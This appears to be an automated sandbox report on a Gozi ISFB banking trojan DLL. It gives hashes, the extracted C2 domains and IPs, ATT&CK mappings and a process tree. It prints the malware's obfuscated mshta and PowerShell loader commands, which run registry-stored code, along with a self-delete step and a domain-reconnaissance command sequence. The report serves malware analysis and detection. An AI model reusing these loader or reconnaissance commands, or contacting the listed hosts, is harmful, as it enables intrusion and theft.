gozi_ifsb | c22549f613c75598c303b06f21c96a93c3e9fa8599278564cacc1139f9bf1fbd

Analysis

max time kernel
151s
max time network
149s
platform
windows10_x64
resource
win10-en-20211208
submitted
14-12-2021 09:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

61b85f6868015.tiff.dll
Size

1.7MB
MD5

84a5ac47cc293aecccee498ea2babf5a
SHA1

7bf025a300cb8ec2dfdd431dc35726de2da87eba
SHA256

c22549f613c75598c303b06f21c96a93c3e9fa8599278564cacc1139f9bf1fbd
SHA512

332a8a659a6ba97b1784eb42f385fe4fcc78362c35978b597bb2a74461c6d7b72f00c59acd5b3f7515203ab3dc2f50f078154d4a1920f547831f23267f242274

Score

10^/10

gozi_ifsb 8899 banker trojan

Malware Config

Extracted

Family

gozi_ifsb

Botnet

8899

microsoft.com/windowsdisabler

windows.update3.com

berukoneru.website

gerukoneru.website

fortunarah.com

assets.msn.com

http://microsoft.com

79.110.52.217

79.110.52.215

45.9.20.190

45.9.20.128

aerukoneru.site

serukoneru.site

yerukoneru.site

karfaganda.com

Attributes

base_path
/tire/
build
260222
dga_season
10
exe_type
loader
extension
.eta
server_id
12

rsa_pubkey.plain

serpent.plain

rsa_pubkey.plain

Signatures

Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 976 set thread context of 3036	976	powershell.exe	Explorer.EXE
PID 3036 set thread context of 3504	3036	Explorer.EXE	RuntimeBroker.exe
PID 3036 set thread context of 2236	3036	Explorer.EXE	cmd.exe
PID 2236 set thread context of 1020	2236	cmd.exe	PING.EXE
PID 3036 set thread context of 1712	3036	Explorer.EXE	WinMail.exe
PID 3036 set thread context of 1944	3036	Explorer.EXE	WinMail.exe
PID 3036 set thread context of 3224	3036	Explorer.EXE	cmd.exe
PID 3036 set thread context of 644	3036	Explorer.EXE	cmd.exe

Drops file in Windows directory 1 IoCs

Processes:

regsvr32.exe

description ioc process

File opened for modification C:\Windows\ regsvr32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2984 3064 WerFault.exe regsvr32.exe
Discovers systems in the same network 1 TTPs 3 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exenet.exe

pid process

2144 net.exe
3852 net.exe
2368 net.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

3488 tasklist.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

3192 ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

3740 systeminfo.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1020 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

1020 PING.EXE

description	ioc	process
File opened for modification	C:\Windows\	regsvr32.exe

pid	pid_target	process	target process
2984	3064	WerFault.exe	regsvr32.exe

pid	process
2144	net.exe
3852	net.exe
2368	net.exe

pid	process
3488	tasklist.exe

pid	process
3192	ipconfig.exe

pid	process
3740	systeminfo.exe

pid	process
1020	PING.EXE

pid	process
1020	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

regsvr32.exepowershell.exeExplorer.EXEWerFault.exe

pid	process
3064	regsvr32.exe
3064	regsvr32.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
2984	WerFault.exe
2984	WerFault.exe
2984	WerFault.exe
2984	WerFault.exe
2984	WerFault.exe
2984	WerFault.exe
2984	WerFault.exe
2984	WerFault.exe
2984	WerFault.exe
2984	WerFault.exe
2984	WerFault.exe
2984	WerFault.exe
2984	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3036 Explorer.EXE
Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

976 powershell.exe
3036 Explorer.EXE
3036 Explorer.EXE
2236 cmd.exe
3036 Explorer.EXE
3036 Explorer.EXE
3036 Explorer.EXE
3036 Explorer.EXE

pid	process
3036	Explorer.EXE

pid	process
976	powershell.exe
3036	Explorer.EXE
3036	Explorer.EXE
2236	cmd.exe
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE
3036	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

powershell.exeExplorer.EXEWerFault.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	976	powershell.exe
Token: SeShutdownPrivilege	3036	Explorer.EXE
Token: SeCreatePagefilePrivilege	3036	Explorer.EXE
Token: SeRestorePrivilege	2984	WerFault.exe
Token: SeBackupPrivilege	2984	WerFault.exe
Token: SeShutdownPrivilege	3036	Explorer.EXE
Token: SeCreatePagefilePrivilege	3036	Explorer.EXE
Token: SeShutdownPrivilege	3036	Explorer.EXE
Token: SeCreatePagefilePrivilege	3036	Explorer.EXE
Token: SeDebugPrivilege	2984	WerFault.exe
Token: SeShutdownPrivilege	3036	Explorer.EXE
Token: SeCreatePagefilePrivilege	3036	Explorer.EXE
Token: SeShutdownPrivilege	3036	Explorer.EXE
Token: SeCreatePagefilePrivilege	3036	Explorer.EXE
Token: SeShutdownPrivilege	3036	Explorer.EXE
Token: SeCreatePagefilePrivilege	3036	Explorer.EXE
Token: SeDebugPrivilege	3488	tasklist.exe
Token: SeShutdownPrivilege	3036	Explorer.EXE
Token: SeCreatePagefilePrivilege	3036	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3036 Explorer.EXE

pid	process
3036	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

regsvr32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.exe

description	pid	process	target process
PID 3552 wrote to memory of 3064	3552	regsvr32.exe	regsvr32.exe
PID 3552 wrote to memory of 3064	3552	regsvr32.exe	regsvr32.exe
PID 3552 wrote to memory of 3064	3552	regsvr32.exe	regsvr32.exe
PID 1936 wrote to memory of 976	1936	mshta.exe	powershell.exe
PID 1936 wrote to memory of 976	1936	mshta.exe	powershell.exe
PID 976 wrote to memory of 3316	976	powershell.exe	csc.exe
PID 976 wrote to memory of 3316	976	powershell.exe	csc.exe
PID 3316 wrote to memory of 1408	3316	csc.exe	cvtres.exe
PID 3316 wrote to memory of 1408	3316	csc.exe	cvtres.exe
PID 976 wrote to memory of 1476	976	powershell.exe	csc.exe
PID 976 wrote to memory of 1476	976	powershell.exe	csc.exe
PID 1476 wrote to memory of 1664	1476	csc.exe	cvtres.exe
PID 1476 wrote to memory of 1664	1476	csc.exe	cvtres.exe
PID 976 wrote to memory of 3036	976	powershell.exe	Explorer.EXE
PID 976 wrote to memory of 3036	976	powershell.exe	Explorer.EXE
PID 976 wrote to memory of 3036	976	powershell.exe	Explorer.EXE
PID 976 wrote to memory of 3036	976	powershell.exe	Explorer.EXE
PID 3036 wrote to memory of 3504	3036	Explorer.EXE	RuntimeBroker.exe
PID 3036 wrote to memory of 3504	3036	Explorer.EXE	RuntimeBroker.exe
PID 3036 wrote to memory of 3504	3036	Explorer.EXE	RuntimeBroker.exe
PID 3036 wrote to memory of 3504	3036	Explorer.EXE	RuntimeBroker.exe
PID 3036 wrote to memory of 2236	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 2236	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 2236	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 2236	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 2236	3036	Explorer.EXE	cmd.exe
PID 2236 wrote to memory of 1020	2236	cmd.exe	PING.EXE
PID 2236 wrote to memory of 1020	2236	cmd.exe	PING.EXE
PID 2236 wrote to memory of 1020	2236	cmd.exe	PING.EXE
PID 2236 wrote to memory of 1020	2236	cmd.exe	PING.EXE
PID 2236 wrote to memory of 1020	2236	cmd.exe	PING.EXE
PID 3036 wrote to memory of 3640	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 3640	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 2148	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 2148	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 1944	3036	Explorer.EXE	WinMail.exe
PID 3036 wrote to memory of 1944	3036	Explorer.EXE	WinMail.exe
PID 3036 wrote to memory of 1944	3036	Explorer.EXE	WinMail.exe
PID 3036 wrote to memory of 1712	3036	Explorer.EXE	WinMail.exe
PID 3036 wrote to memory of 1712	3036	Explorer.EXE	WinMail.exe
PID 3036 wrote to memory of 1712	3036	Explorer.EXE	WinMail.exe
PID 3640 wrote to memory of 3740	3640	cmd.exe	systeminfo.exe
PID 3640 wrote to memory of 3740	3640	cmd.exe	systeminfo.exe
PID 2148 wrote to memory of 3192	2148	cmd.exe	ipconfig.exe
PID 2148 wrote to memory of 3192	2148	cmd.exe	ipconfig.exe
PID 3036 wrote to memory of 1712	3036	Explorer.EXE	WinMail.exe
PID 3036 wrote to memory of 1712	3036	Explorer.EXE	WinMail.exe
PID 3036 wrote to memory of 1944	3036	Explorer.EXE	WinMail.exe
PID 3036 wrote to memory of 1944	3036	Explorer.EXE	WinMail.exe
PID 3036 wrote to memory of 3224	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 3224	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 3224	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 3224	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 2504	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 2504	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 644	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 644	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 644	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 644	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 3316	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 3316	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 3224	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 644	3036	Explorer.EXE	cmd.exe
PID 3036 wrote to memory of 3224	3036	Explorer.EXE	cmd.exe

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3504

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3036

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\61b85f6868015.tiff.dll
2⤵
- Suspicious use of WriteProcessMemory
PID:3552

C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\61b85f6868015.tiff.dll
3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:3064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3064 -s 1828
4⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2984

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ly4c='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ly4c).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\AFB12D6D-42B3-B959-C453-96FD38372A81\\\ToolText'));if(!window.flag)close()</script>"
2⤵
- Suspicious use of WriteProcessMemory
PID:1936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name avlnpnm -value gp; new-alias -name bnmmkr -value iex; bnmmkr ([System.Text.Encoding]::ASCII.GetString((avlnpnm "HKCU:Software\AppDataLow\Software\Microsoft\AFB12D6D-42B3-B959-C453-96FD38372A81").ToolLink))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:976

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v13wlls1\v13wlls1.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3316

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES703A.tmp" "c:\Users\Admin\AppData\Local\Temp\v13wlls1\CSC4CF1F35E531A417A97B2D3D63CD90E6.TMP"
5⤵
PID:1408

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bwexw3d2\bwexw3d2.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1476

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7144.tmp" "c:\Users\Admin\AppData\Local\Temp\bwexw3d2\CSC679670409DA54E1387C54FC9C6EC65C.TMP"
5⤵
PID:1664

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\61b85f6868015.tiff.dll"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2236

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1020

C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:3640

C:\Windows\system32\systeminfo.exe
systeminfo.exe
3⤵
- Gathers system information
PID:3740

C:\Windows\system32\cmd.exe
cmd /C "ipconfig /all >> C:\Users\Admin\AppData\Local\Temp\81A3.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:2148

C:\Windows\system32\ipconfig.exe
ipconfig /all
3⤵
- Gathers network information
PID:3192

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
2⤵
PID:1712

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
2⤵
PID:1944

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:3224

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\81A3.bin1"
2⤵
PID:2504

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:644

C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\81A3.bin1 > C:\Users\Admin\AppData\Local\Temp\81A3.bin & del C:\Users\Admin\AppData\Local\Temp\81A3.bin1"
2⤵
PID:3316

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:2184

C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:2848

C:\Windows\system32\net.exe
net view
3⤵
- Discovers systems in the same network
PID:2368

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:3908

C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:2436

C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
3⤵
PID:1532

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:4004

C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:1624

C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3488

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:2772

C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:2528

C:\Windows\system32\driverquery.exe
driverquery.exe
3⤵
PID:1392

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:1540

C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:644

C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
3⤵
PID:3000

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:736

C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:3912

C:\Windows\system32\net.exe
net config workstation
3⤵
PID:3088

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
4⤵
PID:1020

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:3760

C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:2232

C:\Windows\system32\nltest.exe
nltest /domain_trusts
3⤵
PID:2152

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:3260

C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:2248

C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
3⤵
PID:1348

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:3800

C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:1944

C:\Windows\system32\net.exe
net view /all /domain
3⤵
- Discovers systems in the same network
PID:2144

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:2436

C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:3788

C:\Windows\system32\net.exe
net view /all
3⤵
- Discovers systems in the same network
PID:3852

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:2372

C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\AF06.bin1 > C:\Users\Admin\AppData\Local\Temp\AF06.bin & del C:\Users\Admin\AppData\Local\Temp\AF06.bin1"
2⤵
PID:1772

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Process Discovery

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\81A3.bin
MD5
25b7ce667099b6da2a3a3fe65f05bc81

SHA1
d1bdcb5330dd44eddd483a94d6274ea4c61dfa4e

SHA256
191876bffc8c582f548703ecc88dab6e8260224f54cbb25905b1c8b134f4efd8

SHA512
7e9ae3d9a4d0a25c6210677ab76a69521c649d8711b39657d593c7dcdfec1dbde9a612fd87ad39e46ec5e08c79fda4f31fff067468849fe0263b65b302a466f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\81A3.bin1
MD5
25b7ce667099b6da2a3a3fe65f05bc81

SHA1
d1bdcb5330dd44eddd483a94d6274ea4c61dfa4e

SHA256
191876bffc8c582f548703ecc88dab6e8260224f54cbb25905b1c8b134f4efd8

SHA512
7e9ae3d9a4d0a25c6210677ab76a69521c649d8711b39657d593c7dcdfec1dbde9a612fd87ad39e46ec5e08c79fda4f31fff067468849fe0263b65b302a466f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\81A3.bin1
MD5
25b7ce667099b6da2a3a3fe65f05bc81

SHA1
d1bdcb5330dd44eddd483a94d6274ea4c61dfa4e

SHA256
191876bffc8c582f548703ecc88dab6e8260224f54cbb25905b1c8b134f4efd8

SHA512
7e9ae3d9a4d0a25c6210677ab76a69521c649d8711b39657d593c7dcdfec1dbde9a612fd87ad39e46ec5e08c79fda4f31fff067468849fe0263b65b302a466f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\AF06.bin
MD5
9228a56309e72bd2eef9ef88e0365216

SHA1
f553601c5e3f9431c9e3bf2ca25dc992aa27c277

SHA256
38e2c55bba4b22fb785a9575ad009641f283401a86084ac3666026189be9ab4a

SHA512
22947a80ec23c20d48520cfa109fe38842c0116c64a41fe18c5f54c4a90ee857159b2e379e64535bb99fd4cf7ddb7cdd3696a796230f592a3a02c83911d2ab03

Download Submit
C:\Users\Admin\AppData\Local\Temp\AF06.bin1
MD5
c2713cf9c89248b4e9aeea27256ae82f

SHA1
0346df941b3783d0a5fc9869465b95e52d341a2e

SHA256
101a67dccddf8c38993bd1bee553f4205f30645d1b6a93be92fd7a1d8aa54170

SHA512
4e3825a131743cafbde14abbb4555549343deb4576b1488b62dfb6cdad3c3c0882df36eb7356fdd8909cffb3b2114d6033ef5d88e4995d1a45be3d1e8a20940a

Download Submit
C:\Users\Admin\AppData\Local\Temp\AF06.bin1
MD5
c2713cf9c89248b4e9aeea27256ae82f

SHA1
0346df941b3783d0a5fc9869465b95e52d341a2e

SHA256
101a67dccddf8c38993bd1bee553f4205f30645d1b6a93be92fd7a1d8aa54170

SHA512
4e3825a131743cafbde14abbb4555549343deb4576b1488b62dfb6cdad3c3c0882df36eb7356fdd8909cffb3b2114d6033ef5d88e4995d1a45be3d1e8a20940a

Download Submit
C:\Users\Admin\AppData\Local\Temp\AF06.bin1
MD5
160b1a3c9891ed7b44819ec22f9e6a0d

SHA1
62aa2947f177f841654d69f929ef98e9ebe314f7

SHA256
11e20912b77d4c03e925223d98233fb472e6edd006a388182199e6c9f9900d45

SHA512
97941f44a0e320d33b79d11e27d1dfe4d5ee0f1d77cd941cc929fdc13596427202d9d05ec2cfb179281352f5df1b6341737abaee8b6e35e3a4ef54eaaac2a52b

Download Submit
C:\Users\Admin\AppData\Local\Temp\AF06.bin1
MD5
160b1a3c9891ed7b44819ec22f9e6a0d

SHA1
62aa2947f177f841654d69f929ef98e9ebe314f7

SHA256
11e20912b77d4c03e925223d98233fb472e6edd006a388182199e6c9f9900d45

SHA512
97941f44a0e320d33b79d11e27d1dfe4d5ee0f1d77cd941cc929fdc13596427202d9d05ec2cfb179281352f5df1b6341737abaee8b6e35e3a4ef54eaaac2a52b

Download Submit
C:\Users\Admin\AppData\Local\Temp\AF06.bin1
MD5
3910efaf67afcb46547e5c814ca2a2fb

SHA1
0551fe009d355e5670253fbd1fbd8501aba17b8c

SHA256
cd748dc8a8a141ac884607b02173e4ebac0c96d8b5bb8bc3b1bb80434741f4b9

SHA512
4f70f6cb58970f72627665ec5e26102cc06e668c0976ab92b0cad76678eff35cb9181e929e45ffa0a992282a1e5d34475ccf122ec89da887522a3b84112562a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\AF06.bin1
MD5
3910efaf67afcb46547e5c814ca2a2fb

SHA1
0551fe009d355e5670253fbd1fbd8501aba17b8c

SHA256
cd748dc8a8a141ac884607b02173e4ebac0c96d8b5bb8bc3b1bb80434741f4b9

SHA512
4f70f6cb58970f72627665ec5e26102cc06e668c0976ab92b0cad76678eff35cb9181e929e45ffa0a992282a1e5d34475ccf122ec89da887522a3b84112562a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\AF06.bin1
MD5
2a7118457990f6da9f1f01233108ccc8

SHA1
f8135a0631455a42cc4b6782fe904ecc407f0f34

SHA256
fe1222ece81fc868533c95bd2e735fb7e652fc52658029b8dba79165b6d1466c

SHA512
0b35a31035e39852f2970d4708dd421b86b0a90efb253f54efc56ab93d5009cf7828c3df596d62acb635a38095bbd2ceb29806f65e7db7812124b32f32d79a32

Download Submit
C:\Users\Admin\AppData\Local\Temp\AF06.bin1
MD5
2a7118457990f6da9f1f01233108ccc8

SHA1
f8135a0631455a42cc4b6782fe904ecc407f0f34

SHA256
fe1222ece81fc868533c95bd2e735fb7e652fc52658029b8dba79165b6d1466c

SHA512
0b35a31035e39852f2970d4708dd421b86b0a90efb253f54efc56ab93d5009cf7828c3df596d62acb635a38095bbd2ceb29806f65e7db7812124b32f32d79a32

Download Submit
C:\Users\Admin\AppData\Local\Temp\AF06.bin1
MD5
ffe3076ff32434119f17a00b512f9398

SHA1
fc7a829929a536d9d221a79c842c55dab8d8ce0d

SHA256
6de721f935321a8074ed705768489907807a606963adec2db6f87c6c523fc243

SHA512
4ce26b9fa3358f790dab7025d3fa5c9d7a89e958e68fe5cddb1f36779f12ea5afdcb0fe3e4cbfc7a2616ec046e30dd91eb8a43c94a31dd9c878e0ab7819a8b19

Download Submit
C:\Users\Admin\AppData\Local\Temp\AF06.bin1
MD5
ffe3076ff32434119f17a00b512f9398

SHA1
fc7a829929a536d9d221a79c842c55dab8d8ce0d

SHA256
6de721f935321a8074ed705768489907807a606963adec2db6f87c6c523fc243

SHA512
4ce26b9fa3358f790dab7025d3fa5c9d7a89e958e68fe5cddb1f36779f12ea5afdcb0fe3e4cbfc7a2616ec046e30dd91eb8a43c94a31dd9c878e0ab7819a8b19

Download Submit
C:\Users\Admin\AppData\Local\Temp\AF06.bin1
MD5
c4c2a40d67b43c928bc083fd7e5eb495

SHA1
106e2d3c6728f8d7b9bf8eb7a1a57af5e697a8d9

SHA256
7e7a38c3ef325ac63ae7cd3febd4ee7c92891f998d4dffcdcb1396fff0ea4aae

SHA512
0cf86f0498bac9c1b15a10ffae6ddc620a89fb4bc638fd7eca5b149e02d30e82d0acdfc91146789ea99b64719bb2723825ef54e850aaa24679996b5d73dd13da

Download Submit
C:\Users\Admin\AppData\Local\Temp\AF06.bin1
MD5
c4c2a40d67b43c928bc083fd7e5eb495

SHA1
106e2d3c6728f8d7b9bf8eb7a1a57af5e697a8d9

SHA256
7e7a38c3ef325ac63ae7cd3febd4ee7c92891f998d4dffcdcb1396fff0ea4aae

SHA512
0cf86f0498bac9c1b15a10ffae6ddc620a89fb4bc638fd7eca5b149e02d30e82d0acdfc91146789ea99b64719bb2723825ef54e850aaa24679996b5d73dd13da

Download Submit
C:\Users\Admin\AppData\Local\Temp\AF06.bin1
MD5
89a172cb36936e30cbd75ac7bc579f92

SHA1
2b6ba0ff1b0077e041afb68e108322f21a67c945

SHA256
d6d1444311689dd01f8ae5d48e59583c49ac09a0aeb48e3d6f013ab16e2d322a

SHA512
